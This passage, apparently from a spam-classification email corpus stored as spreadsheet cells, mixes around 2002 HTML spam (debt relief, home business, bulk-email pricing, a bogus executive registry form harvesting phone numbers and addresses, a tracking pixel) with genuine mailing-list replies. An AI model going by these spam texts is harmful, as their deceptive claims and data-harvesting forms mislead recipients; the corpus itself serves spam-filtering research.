             src="http://65.162.84.5/images/051402_001_checkmark.jpg" width=15&gt;&amp;nbsp;Stop Late or Over 
             the Limit Fees.&lt;BR&gt;&lt;IMG height=14 
             src="http://65.162.84.5/images/051402_001_checkmark.jpg" width=15&gt;&amp;nbsp;Combine Your 
             Bills into One Low Simple Payment.&lt;BR&gt;&lt;IMG height=14 
             src="http://65.162.84.5/images/051402_001_checkmark.jpg" width=15&gt;&amp;nbsp;Provide a 
             Structured Payment Plan.&lt;BR&gt;&lt;IMG height=14 
             src="http://65.162.84.5/images/051402_001_checkmark.jpg" width=15&gt; Bring Your Account to 
             a Current Status.&lt;BR&gt;&lt;IMG height=14 
             src="http://65.162.84.5/images/051402_001_checkmark.jpg" width=15&gt; Private Handling of 
             Your Accounts.&lt;BR&gt;&lt;IMG height=14 src="http://65.162.84.5/images/051402_001_checkmark.jpg" 
             width=15&gt; Put a Debt Specialist on Your Side.&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD vAlign=top width=136&gt;&lt;IMG height=70 
             src="http://65.162.84.5/images/051402_001_1x1.gif" width=135&gt;&lt;BR&gt;&lt;A 
             href="http://65.162.84.5/perl/051402_01.pl"&gt;&lt;IMG border=0 
             height=45 src="http://65.162.84.5/images/051402_001_1x1.gif" width=135&gt;&lt;/A&gt; 
       &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;FONT color=#ff0000 size=3&gt;&lt;BR&gt;&lt;BR&gt;&lt;B&gt;&lt;FONT 
       face="Arial, Helvetica, sans-serif"&gt;Not A Loan, No Credit Check, No 
       Property Needed. &lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;p&gt;&lt;font size=-1 color=black&gt;This email is not sent unsolicited. You are receiving it because you requested receive this email by opting-in with our marketing partner. You will receive notices of exciting offers, products, and other options! However, we are committed to only sending to those people that desire these offers. If you do not wish to receive such offers 
 &lt;a href="http://65.162.84.5/perl/unsubscribe.pl?s=20020515105308000000671663"&gt;&lt;b&gt;&lt;font size="-1" color = blue&gt;Click Here.&lt;/font&gt;&lt;/b&gt;&lt;/a&gt; or paste the following into any browser:&lt;/p&gt; http://65.162.84.5/perl/unsubscribe.pl?s=20020515105308000000671663 &lt;br&gt;&lt;br&gt;&lt;p&gt; to remove your email name from our list. You may contact our company by mail at 1323 S.E. 17th Street, Suite Number 345, Ft. Lauderdale, Fl 33316&lt;/p&gt; 
 &lt;img src="http://65.162.84.5/perl/r_open1.pl?serialno=20020515105308000000671663"&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re[2]: The absurdities of life.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 JH&gt; They are legally required to do that.  I got a similar check because an
 JH&gt; insurance company didn't pay a claim quickly enough.  It might have been
 JH&gt; $.02.
 JH&gt; Although they spent lots more than $.33 to mail you the check, the
 JH&gt; alternative seems to be to keep the money.  Do you really want companies
 JH&gt; to have a financial incentive to over-bill you 'just a bit' so they
 JH&gt; could keep it?  For a company with millions of customers, $.33/customer
 JH&gt; starts adding up.
 Christ, you sound worse than me.
 What I -said- in my post, John, was that instead of having to dole out
 stupid refunds, I'd rather they save the costs incurred, knock off one
 of those bullshit surcharges that they inevitably charge for promoting
 services like these, and move on.  SOmething tells me, it'd balance
 out.  Problem is, they're silly, they don't want to do this, and
 rather than the legislation coming up with an affective means of
 controlling the situation (overcharging) they impose silly
 requirements like this.
 &gt;&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 &gt;&gt; bitbitch@magnesium.net
 &gt;&gt; So I get a check from Pac Bell today (SBC as they're called now).
 &gt;&gt; Turns out, they went to the trouble of printing out, signing, sealing
 &gt;&gt; and stamping a check just to refund me for a whole $0.33.
 &gt;&gt; 
 &gt;&gt; They easily spent more than this just getting the materials together.
 &gt;&gt; Why the hell do companies bother to do this crap?  I mean, isn't there
 &gt;&gt; a bottom line in terms of cost effectiveness?  I don't think I missed
 &gt;&gt; the .33, but I sure as hell would have appreciated lower rates in lieu
 &gt;&gt; of being returned pennies.
 &gt;&gt; 
 &gt;&gt; I'm truly stuck on this though.  I don't know whether to frame the
 &gt;&gt; check, burn it, or cash it in.  Maybe I should find a way to return to
 &gt;&gt; sender, so they have to spend -more- money on giving me my .33 dues.
 &gt;&gt; 
 &gt;&gt; 
 &gt;&gt; Does .33 even buy anything anymore?  Funny bit of it, is I couldn't
 &gt;&gt; even make a phone call these days.
 &gt;&gt; 
 &gt;&gt; *boggled*
 &gt;&gt; BB.
 &gt;&gt; 
 &gt;&gt; --
 &gt;&gt; Best regards,
 &gt;&gt;  bitbitch                          mailto:bitbitch@magnesium.net
 -- 
 Best regards,
  bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] paulgraham.com article
</t>
  </si>
  <si>
    <t xml:space="preserve">Hess, Mtodd, /mth wrote:
 &gt; Yes, it is very impressive.  However, all of the most advanced content
 &gt; filtering known to man is easily defeated by simply presenting the content
 &gt; in the form of a graphic image (GIF, JPG, etc.).  I'm surprised that more
 &gt; spammers don't already do this.  I know we have discussed this before, and
 &gt; maybe we can detect this type of spam via the headers and with Razor/DCC (if
 &gt; you're using them).  But that sure narrows down the ruleset (maybe that's
 &gt; good).
 Doesn't defeat this system at all. If you see that once, feed it into 
 your bayesian classifier, and it classifies the URLs used for the 
 images. Then next time it sees one, it knows with almost 100% accuracy 
 that an email with one of those URLs is definitely spam.
 In many ways this is like Razor, which is why I'm hacking on a 
 distributed system to do this, to see if it's feasible to scale it globally.
 Matt.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</si>
  <si>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BIZZ OPP &amp; FREE Vacation                         3867
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;&lt;/P&gt;&lt;P ALIGN=3DCENTER&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffffff" style=
 =3D"BACKGROUND-COLOR: #ffffff" SIZE=3D2 PTSIZE=3D10&gt;&lt;B&gt;Are your tired of 9=
  to 5? &lt;BR&gt;
 Let us show you how to be successful from your home...&lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR=
 : #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D=
 "0"&gt;&lt;/B&gt;&lt;BR&gt;
 We are living in the most prosperous time in &lt;BR&gt;
 history. Now is your turn to profit. Learn to &lt;BR&gt;
 earn &lt;B&gt;&lt;I&gt;6 Figures from home&lt;/B&gt;&lt;/I&gt;. &lt;I&gt;It is easier than ever!&lt;/I&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;B&gt;Plus, receive your FREE GIFT &amp; FREE Info when&lt;BR&gt;
 visiting our web site.&lt;/B&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR=
 : #ffffff" SIZE=3D3 PTSIZE=3D11 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D=
 "0"&gt;&lt;B&gt;&lt;A HREF=3D"http://www.1chn.com/user10/"&gt;CLICK HERE!&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;=
 FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #fffff=
 f" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;/B=
 &gt;&lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR=
 : #ffffff" SIZE=3D1 PTSIZE=3D8 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D=
 "0"&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;I&gt;You were sent this message because your address is in our subscriber da=
 tabase. &lt;BR&gt;
 If you wish to be removed, please &lt;A HREF=3D"mailto:nothnx2001@yahoo.com?s=
 ubject=3Dremove"&gt;click here&lt;/A&gt; and we will remove you from our subscriber=
  list.&lt;BR&gt;
 &lt;/P&gt;&lt;P ALIGN=3DLEFT&gt;&lt;BR&gt;
 &lt;/I&gt;&lt;/FONT&gt;ss1&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 4 Oct 2002, Mark Derricutt wrote:
 &gt; Anyone know where one could get rpms for alot of the python libraries for 
 &gt; 2.2?
 &gt; 
 &gt; Its darn annoying the way RH ship python 1.5.2 and python 2.2 (as python2) 
 &gt; and libs that only work with one or the other :(
 &gt; 
 &gt; esp. the pgdb and xml modules.
 &gt; 
 &gt; Anyone know why Red Hat insist on sticking with python 1.5.2?
 They want to preserve binary compatibility for all .x releases. Red Hat 
 8.0 has python 2.2 as default.
 -- 
 	- Panu -
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: --&gt; DIRECT MARKETING WILL INCREASE SALES           23875
</t>
  </si>
  <si>
    <t xml:space="preserve">There is NO stumbling on to it! 
 The greatest way of marketing this century 
 is undoubtedly direct e-mail. 
 It's similar to the postman delivering a 
 letter to your mailbox. 
 The ability to promote your product, 
 service, website, or MLM/network marketing 
 opportunity to millions instantly is what 
 advertisers have been dreaming of for over 100 years. 
 We e-mail your promotion to a list of our
 general/business addresses.
 The greatest part is, it's completely affordable.
 E-MAIL MARKETING IS THE ANSWER! 
 How do we know? 
 We know because that's exactly what we do.
 It's a proven fact that you can attract 
 new business through our Direct E-mail Marketing. 
 The profits that E-mail advertising generate are amazing!
 We are living proof. 
 We are a direct E-mail internet advertising company and 
 our clients pay us thousands of dollars a week to E-mail 
 their products and services.  
 STANDARD PRICING AND PROCEDURES
 ----------------------------------------------------------
 EXTRACTING:
 Our list of general Internet addresses are actually extracted 
 from the most popular web sites on the Internet. The addresses 
 are verified and run through our purification process. 
 The process includes addresses run against our custom remove 
 filter of 2,492 keywords, as well as through our 192MB remove /
 flamer list. The EDU, ORG, GOV, MIL, and US domains are removed, 
 as well as other domains that asked not to receive e-mail.
 ------------------------------------------------------------
 EVALUATION:  $350.00 (optional)
 One of our marketing specialists will evaluate your sales 
 letter, and offer his/her expertise on how to make it the 
 most successful.
 -------------------------------------------------------------
 STANDARD PRICING: (Emails Delivered)
 1 Million- $700.00 per
 2-3 Million- $600.00 per
 4 Million- $500.00 per
 5 Million &amp; up - $400.00 per
 --------------------------------------------------------------
 SPECIAL LIMITED TIME OFFER!
 This introductory offer of $300.00 includes:
 1. Set-Up Fee
 2. Evaluation of Sales Letter 
 3. 500,000 e-mails delivered
 --------------------------------------------------------------
 PAYMENT POLICY:
 All services must be paid in full prior to delivery of 
 advertisement.
 ---------------------------------------------------------------
 NOTICE: 
 Absolutely no threatening or questionable materials. 
 If you are serious about Direct&gt;&gt;Email&gt;&gt;Marketing&gt;&gt;--Send 
 the following to {fax} 1(602) 392-8288
 ---------------------------------------------------------------
 PLEASE FILL THIS FORM OUT COMPLETELY!
 Contact Name: _____________________________________________
 Business Name:  ______________________________________
 # Years in Business:  _________________________
 Business Type:  ______________________________________
 Address: _________________________________________________
 City: ____________________  State: ______  
 Zip: ______________  Country: _______________
 Email Address: _______________________________________________
 Phone:  __________________________ Fax:  _______________________
 &gt;&gt;&gt;&gt;&gt;-&gt;
 To get out of our email database send an email to 
 publicservice1@btamail.net.cn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: All Your Life #4C55
</t>
  </si>
  <si>
    <t xml:space="preserve">
 This is a MIME Message
 ------=_NextPart_000_007F_01BDF6C7.FABAC1B0
 Content-Type: multipart/alternative; boundary="----=_NextPart_001_0080_01BDF6C7.FABAC1B0"
 ------=_NextPart_001_0080_01BDF6C7.FABAC1B0
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 ***** This is an HTML Message ! *****
 ------=_NextPart_001_0080_01BDF6C7.FABAC1B0
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!doctype html public "-//w3c//dtd html 4=2E0
  transitional//en"&gt;
  &lt;html&gt;
  &lt;head&gt;
     &lt;title&gt;Executive Guild Membership
  ApplicationResponse-O-Matic Form&lt;/title&gt;
  &lt;/head&gt;
  &lt;body text=3D"#808080" bgcolor=3D"#FFFF99"
  link=3D"#800040" vlink=3D"#FF0000" alink=3D"#8080C0"&gt;
  &lt;p&gt;
  &lt;font color=3D"#000000"&gt;Dear Candidate,=A0&lt;br&gt;
  &lt;br&gt;
  You have been selected as a potential candidate for a free listing in=A0&lt;=
 br&gt;
  the  2001 Edition of the International Executive Guild Registry=2E=A0&lt;br&gt;=
  &lt;br&gt;
  Please accept our congratulations for this coveted honor=2E=A0&lt;br&gt;
  &lt;br&gt;
  As this edition is so important in view of the new millennium, the=A0&lt;br&gt;=
  International Executive Guild Registry will be published in two different=
 =A0&lt;br&gt;
  formats; the searchable CD-ROM and the Online Registry=2E=A0&lt;br&gt;
  &lt;br&gt;
  Since inclusion can be considered recognition of your career position=A0&lt;=
 br&gt;
  and professionalism, each candidate is evaluated in keeping with high=A0&lt;=
 br&gt;
  standards of individual achievement=2E In light of this, the Internationa=
 l Executive&lt;br&gt;
  Guild thinks that you may make an interesting biographical subject=2E=A0&lt;=
 br&gt;
  &lt;br&gt;
  We look forward to your inclusion and appearance in the International=A0&lt;=
 br&gt;
  Executive Guild's Registry=2E Best wishes for your continued success=2E=A0=
 &lt;br&gt;
  &lt;br&gt;
  International Executive Guild=A0&lt;br&gt;
  Listing Dept=2E=A0&lt;/font&gt;
  &lt;hr WIDTH=3D"100%"&gt;
  &lt;p align=3D"center"&gt;&lt;b&gt;&lt;i&gt;&lt;font color=3D"#000000"&gt;If you
  wish to be removed from our list, please submit
  your request&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;
  &lt;br&gt;&lt;b&gt;&lt;i&gt;&lt;font face=3D"Times New
  Roman,Times"&gt;&lt;font color=3D"#000000"&gt;at the
  bottom of this email=2E&lt;/font&gt;&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;
  &lt;/p&gt;
  &lt;hr WIDTH=3D"100%"&gt;
  &lt;table WIDTH=3D"695" &gt;
  &lt;caption&gt;&lt;script language=3D"JavaScript"&gt;
  &lt;!--
  function validate_form() {
    validity =3D true; // assume valid
    if (!check_empty(document=2Eform=2Ebusphone=2Evalue))
          { validity =3D false; alert('Day Time
  Phone field is empty!'); }
      if (validity)
          alert ("Thank you for your registration!
  "
                  + "Your form is now being passed
  to your browser's "
                  + "Mail Delivery Sub-System for
  NORMAL"
                  + " NON-ENCRYPTED email
  delivery=2E"
                  + "  All email addresses are
  removed from our system"
                  + " upon registration=2E  Please
  click OK to proceed");
    return validity;
  }
  function check_empty(text) {
    return (text=2Elength &gt; 0); // returns false if
  empty
  }
  // --&gt;
  &lt;/script&gt;
  &lt;!-- CHANGE EMAIL ADDRESS IN ACTION OF FORM --&gt;
  &lt;form name=3D"form"
   method=3D"post"
   action=3D"mailto:carment5y@mail=2Ecom?SUBJECT=3DIEG Registration"
   enctype=3D"text/plain"
  &lt;tr&gt;
   &lt;/caption&gt;
  &lt;td&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
  &lt;td VALIGN=3DTOP COLSPAN=3D"2"&gt;
  &lt;center&gt;&lt;b&gt;&lt;i&gt;&lt;font color=3D"#000000"&gt;&lt;font
  size=3D+3&gt;International Executive Guild&lt;/font&gt;&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;
  &lt;br&gt;&lt;b&gt;&lt;font color=3D"#000000"&gt;&lt;font
  size=3D+2&gt;Registration Form&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
  &lt;br&gt;&lt;b&gt;&lt;font color=3D"#000000"&gt;(US and Canada
  Only)&lt;/font&gt;&lt;/b&gt;
  &lt;br&gt;
  &lt;hr WIDTH=3D"100%"&gt;&lt;/center&gt;
  &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
  &lt;td VALIGN=3DTOP COLSPAN=3D"2"&gt;&lt;i&gt;&lt;font
  face=3D"arial,helvetica"&gt;&lt;font
  color=3D"#000000"&gt;&lt;font size=3D+0&gt;Please
  fill out this form if you would like to be
  included on The International
  Executive Guild, For accuracy and
  publication purposes, please
  complete and send this form at the earliest
  opportunity=2E There is &lt;/font&gt;no
  charge or obligation&lt;font size=3D+0&gt; to be listed
  on The International Executive Guild=2E&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/i&gt;
  &lt;br&gt;
  &lt;hr WIDTH=3D"100%"&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
  &lt;td VALIGN=3DTOP&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
  &lt;td ALIGN=3DRIGHT WIDTH=3D"300"&gt;&lt;b&gt;&lt;font
  face=3D"arial,helvetica"&gt;&lt;font
  color=3D"#000000"&gt;&lt;font size=3D-1&gt;Your
  Name&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
  &lt;td ALIGN=3DLEFT WIDTH=3D"300"&gt;&lt;input type=3D"text"
  value size=3D"50" maxlength=3D"250" name=3D"Name"&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
  &lt;td ALIGN=3DRIGHT WIDTH=3D"300"&gt;&lt;b&gt;&lt;font
  face=3D"arial,helvetica"&gt;&lt;font
  color=3D"#000000"&gt;&lt;font size=3D-1&gt;Your
  Company&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
  &lt;td ALIGN=3DLEFT WIDTH=3D"300"&gt;&lt;input type=3D"text"
  value size=3D"50" maxlength=3D"250"
  name=3D"Company"&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
  &lt;td ALIGN=3DRIGHT WIDTH=3D"300"&gt;&lt;b&gt;&lt;font
  face=3D"arial,helvetica"&gt;&lt;font
  color=3D"#000000"&gt;&lt;font size=3D-
  1&gt;Title&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
  &lt;td ALIGN=3DLEFT WIDTH=3D"300"&gt;&lt;input type=3D"text"
  value size=3D"50" maxlength=3D"250"
  name=3D"Title"&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
  &lt;td ALIGN=3DRIGHT WIDTH=3D"300"&gt;&lt;b&gt;&lt;font
  face=3D"arial,helvetica"&gt;&lt;font
  color=3D"#000000"&gt;&lt;font size=3D-
  1&gt;Address&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
  &lt;td ALIGN=3DLEFT WIDTH=3D"300"&gt;&lt;input type=3D"text"
  value size=3D"50" maxlength=3D"250"
  name=3D"Address"&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
  &lt;td ALIGN=3DRIGHT WIDTH=3D"300"&gt;&lt;b&gt;&lt;font
  face=3D"arial,helvetica"&gt;&lt;font
  color=3D"#000000"&gt;&lt;font size=3D-
  1&gt;City&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
  &lt;td ALIGN=3DLEFT WIDTH=3D"300"&gt;&lt;input type=3D"text"
  value size=3D"50" maxlength=3D"250" name=3D"City"&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
  &lt;td ALIGN=3DRIGHT WIDTH=3D"300"&gt;&lt;b&gt;&lt;font
  face=3D"arial,helvetica"&gt;&lt;font
  color=3D"#000000"&gt;&lt;font size=3D-1&gt;State
  or Province&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
  &lt;td ALIGN=3DLEFT WIDTH=3D"300"&gt;&lt;input type=3D"text"
  value size=3D"12" maxlength=3D"50" name=3D"State"&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
  &lt;td ALIGN=3DRIGHT WIDTH=3D"300"&gt;&lt;b&gt;&lt;font
  face=3D"arial,helvetica"&gt;&lt;font
  color=3D"#000000"&gt;&lt;font size=3D-
  1&gt;Country&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
  &lt;td ALIGN=3DLEFT WIDTH=3D"300"&gt;&lt;select
  NAME=3D"Country" Size=3D"1"&gt;&lt;option SELECTED&gt;&lt;font
  color=3D"#000000"&gt;USA&lt;option
  SELECTED&gt;Canada&lt;/font&gt;&lt;/select&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
  &lt;td ALIGN=3DRIGHT WIDTH=3D"300"&gt;&lt;b&gt;&lt;font
  face=3D"arial,helvetica"&gt;&lt;font
  color=3D"#000000"&gt;&lt;font size=3D-1&gt;ZIP/Postal
  Code&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
  &lt;td ALIGN=3DLEFT VALIGN=3DCENTER WIDTH=3D"300"&gt;&lt;input
  type=3D"text" value size=3D"12" maxlength=3D"50"
  name=3D"Zip"&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
  &lt;td ALIGN=3DRIGHT WIDTH=3D"300"&gt;&lt;b&gt;&lt;font
  face=3D"arial,helvetica"&gt;&lt;font
  color=3D"#000000"&gt;&lt;font size=3D-1&gt;Day
  Time Telephone&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
  &lt;td ALIGN=3DLEFT WIDTH=3D"300"&gt;&lt;input type=3D"text"
  value size=3D"22" maxlength=3D"50"
  name=3D"busphone"&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
  &lt;td&gt;
  &lt;div align=3Dright&gt;&lt;b&gt;&lt;font
  face=3D"Arial,Helvetica"&gt;&lt;font
  color=3D"#000000"&gt;&lt;font size=3D-1&gt;Home
  Phone&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
  &lt;/td&gt;
  &lt;td&gt;&lt;input type=3D"text" value size=3D"22"
  maxlength=3D"50" name=3D"homephone"&gt;&lt;b&gt;&lt;font
  color=3D"#000000"&gt;&lt;font size=3D-2&gt;(Not
  To Be Published)&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
  &lt;td&gt;
  &lt;div align=3Dright&gt;&lt;b&gt;&lt;font
  face=3D"Arial,Helvetica"&gt;&lt;font
  color=3D"#000000"&gt;&lt;font size=3D-
  1&gt;Email&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
  &lt;/td&gt;
  &lt;td&gt;&lt;input type=3D"text" value size=3D"50"
  maxlength=3D"100" name=3D"Email"&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
  &lt;td&gt;&lt;/td&gt;
  &lt;td&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;/table&gt;
  &lt;center&gt;
  &lt;p&gt;
  &lt;hr WIDTH=3D"100%"&gt;&lt;b&gt;&lt;font
  face=3D"ARIAL,HELVETICA"&gt;&lt;font
  color=3D"#000000"&gt;&lt;font size=3D-1&gt;TO
  HELP US IN CONSIDERING YOUR APPLICATION, PLEASE
  TELL US A LITTLE ABOUT
  YOURSELF=2E=2E=2E&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
  &lt;br&gt;
  &lt;hr WIDTH=3D"100%"&gt;&lt;/center&gt;
  &lt;center&gt;&lt;table WIDTH=3D"81%" &gt;
  &lt;tr&gt;
  &lt;td ALIGN=3DRIGHT VALIGN=3DTOP WIDTH=3D"300"&gt;&lt;b&gt;&lt;font
  face=3D"arial,helvetica"&gt;&lt;font
  color=3D"#000000"&gt;&lt;font size=3D-1&gt;Your
  Business&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
  &lt;td&gt;
  &lt;div align=3Dright&gt;&lt;input type=3D"text" value
  size=3D"50" maxlength=3D"200"
  name=3D"business"&gt;&lt;/div&gt;
  &lt;font face=3D"arial,helvetica"&gt;&lt;font color=3D"#000000"&gt;&lt;font
  size=3D-1&gt;(Financial
  Svcs, Banking, Computer Hardware, Software, Professional Svcs,
  Chemicals,
  Apparel, Aerospace, Food, Government, Utility,
  etc=2E)&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
  &lt;td ALIGN=3DRIGHT VALIGN=3DTOP WIDTH=3D"300"&gt;&lt;b&gt;&lt;font
  face=3D"arial,helvetica"&gt;&lt;font
  color=3D"#000000"&gt;&lt;font size=3D-1&gt;Type
  of Organization&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
  &lt;td&gt;
  &lt;div align=3Dright&gt;&lt;input type=3D"text" value size=3D"50" maxlength=3D"25=
 0"
  name=3D"Orgtype"&gt;&lt;/div&gt;
  &lt;font face=3D"arial,helvetica"&gt;&lt;font color=3D"#000000"&gt;&lt;font size=3D-1&gt;(M=
 fg,
  Dist/Wholesaler, Retailer, Law Firm,&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;
  &lt;br&gt;&lt;font face=3D"arial,helvetica"&gt;&lt;font color=3D"#000000"&gt;&lt;font
  size=3D-1&gt;Investment
  Bank, Commercial Bank, University,&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;
  &lt;br&gt;&lt;font face=3D"arial,helvetica"&gt;&lt;font color=3D"#000000"&gt;&lt;font
  size=3D-1&gt;Financial
  Consultants, Ad Agency, Contractor, Broker,
  etc=2E)&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
  &lt;td VALIGN=3DTOP WIDTH=3D"300"&gt;
  &lt;div align=3Dright&gt;&lt;b&gt;&lt;font face=3D"arial,helvetica"&gt;&lt;font
  color=3D"#000000"&gt;&lt;font
  size=3D-1&gt;Your
  Business Expertise&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
  &lt;/td&gt;
  &lt;td&gt;
  &lt;div align=3Dright&gt;&lt;input type=3D"text" value size=3D"50" maxlength=3D"25=
 0"
  name=3D"expertise"&gt;&lt;/div&gt;
  &lt;font face=3D"arial,helvetica"&gt;&lt;font color=3D"#000000"&gt;&lt;font
  size=3D-1&gt;(Corp=2EMgmt,
  Marketing, Civil Engineering,&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;
  &lt;br&gt;&lt;font face=3D"arial,helvetica"&gt;&lt;font color=3D"#000000"&gt;&lt;font size=3D-=
 1&gt;Tax
  Law, Nuclear Physics, Database Development, Operations, Pathologist,
  Mortgage
  Banking, etc=2E)&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
  &lt;td ALIGN=3DRIGHT VALIGN=3DTOP WIDTH=3D"300"&gt;&lt;b&gt;&lt;font
  face=3D"arial,helvetica"&gt;&lt;font
  color=3D"#000000"&gt;&lt;font size=3D-1&gt;Major
  Product Line&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
  &lt;td&gt;
  &lt;div align=3Dright&gt;&lt;input type=3D"text" value size=3D"50" maxlength=3D"25=
 0"
  name=3D"product"&gt;&lt;/div&gt;
  &lt;font face=3D"arial,helvetica"&gt;&lt;font color=3D"#000000"&gt;&lt;font
  size=3D-1&gt;(Integrated
  Circuits, Commercial Aircraft, Adhesives, Cosmetics, Plastic Components,
  Snack Foods, etc=2E)&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;/table&gt;&lt;/center&gt;
  &lt;center&gt;
  &lt;p&gt;&lt;input NAME=3D"submit" TYPE=3D"submit" VALUE=3D" Submit By E-Mail "&gt;&lt;i=
 nput
  NAME=3D"reset" TYPE=3D"reset" VALUE=3D" Clear Form "&gt;&lt;/form&gt;
  &lt;br&gt;&lt;b&gt;&lt;font color=3D"#000000"&gt;&lt;font size=3D-1&gt;Note: Submitting this form=
  will
  be made by email, not by use of&amp;nbsp; www=2E&amp;nbsp; Confirmation of its de=
 livery
  is made by browsing your outgoing mail=2E&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
  &lt;br&gt;
  &lt;hr WIDTH=3D"100%"&gt;&lt;b&gt;&lt;i&gt;&lt;font face=3D"arial,helvetica"&gt;&lt;font
  color=3D"#000000"&gt;&lt;font
  size=3D-1&gt;Thank
  you for filling in this form, we will contact you with more
  information=2E&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;
  &lt;br&gt;
  &lt;hr WIDTH=3D"100%"&gt;
  &lt;br&gt;&lt;b&gt;&lt;font size=3D+1&gt;List
  Removal&lt;/font&gt;&lt;/b&gt;
  &lt;br&gt;&lt;b&gt;&lt;font color=3D"#000000"&gt;&lt;font size=3D-1&gt;&lt;a
  href=3D"mailto:carment5y@usa=2Ecom?subject=3Dremove"&gt;Click
